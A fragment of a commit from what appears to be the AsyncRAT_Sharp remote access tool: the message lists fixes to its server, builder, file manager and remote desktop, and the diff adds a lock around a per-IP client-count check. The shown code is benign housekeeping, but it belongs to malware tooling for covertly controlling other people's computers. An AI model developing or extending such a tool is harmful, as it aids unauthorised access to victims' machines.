-Fixed server crash at startup
-Fixed file manager - download file
-Fixed builder form freeze
-Added visit website
-Added performance counter (making ping useful)
-Improve remote desktop
This commit is contained in:
NYAN CAT 2019-04-26 12:20:57 -07:00
parent 9bf11d5cfe
commit 7acc6881f3

View File

@ -33,11 +33,14 @@ namespace AsyncRAT_Sharp.Sockets
} }
int count = 0; int count = 0;
lock (Settings.Online)
{
foreach (Clients client in Settings.Online) foreach (Clients client in Settings.Online)
{ {
if (client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0] == socket.RemoteEndPoint.ToString().Split(':')[0]) if (client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0] == socket.RemoteEndPoint.ToString().Split(':')[0])
count++; count++;
} }
}
if (count >= 5) if (count >= 5)
{ {